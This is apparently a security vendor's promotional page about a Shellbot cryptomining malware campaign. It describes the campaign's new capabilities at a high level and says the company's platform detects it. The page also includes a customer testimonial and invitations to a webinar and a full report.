Live Demo

Inside an Active Shellbot Cryptomining Malware Campaign

Threat Stack’s Security Operations Center (SOC) discovered and is monitoring an ongoing and evolving cryptojacking campaign that leverages a variant of the Shellbot malware. In one variant of the Shellbot campaign, Threat Stack identified the addition of a new SSH brute force tool, a secondary command and control method, and the added ability to stop other cryptominers on infected servers.


Overall this is a sophisticated malware campaign that has been updated at least once during the investigation and will likely continue to be updated as time goes on. The main goal of this campaign appears to be monetary gain via cryptomining and propagating itself to other systems on the internet. However, the possibility of data exfiltration and/or lateral movement cannot be discounted as the malware appears to have the capability to perform more than just cryptomining.

Do We Catch It? Yes We Do!

The current form of the campaign will be detected by the Threat Stack Cloud Security Platform since it partially executes out of /tmp/ and downloads files via wget and cURL. While it has been detected in both live customer environments and test environments, the full level of detection will be dependent on the rulesets enabled.

Threat Stack has been a great tool to have in our arsenal. We like the idea of sticking to our core business competencies - healthcare, healthcare marketing, and strategic planning - while being able to outsource or augment other things that are valuable but simply outside our area of expertise.

Brian Dailey
Co-founder and CTO


Including details of the malware components, the active cryptomining campaign flow, and future investigations.

Register for Webinar


A Threat Stack Security Analyst will walk through each step of the observed attack including the initial vector, malware campaign flow, and the actual log files and alerts triggered during the attack.

Read the Report